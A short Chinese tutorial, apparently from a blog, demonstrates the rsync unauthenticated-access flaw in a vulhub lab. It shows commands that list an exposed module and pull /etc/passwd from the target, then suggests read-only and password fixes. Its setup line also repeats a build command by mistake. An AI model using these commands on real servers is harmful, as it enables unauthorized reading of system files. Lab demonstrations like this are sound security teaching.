rsync 未授权访问漏洞

前言

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

环境搭建

cd vulhub/rsync/common

docker-compose build && docker-compose build

rsync 未授权访问漏洞_第1张图片

环境启动后,我们用rsync命令访问之:

有一个src模块,我们再列出这个模块下的文件:

rsync rsync://your-ip:873/src/

rsync 未授权访问漏洞_第2张图片

这是一个Linux根目录,我们可以下载任意文件:

rsync -av rsync://your-ip:873/src/etc/passwd ./

rsync 未授权访问漏洞_第3张图片

修复建议

配置只读

配置认证用户名或者密码

你可能感兴趣的:(安全,安全)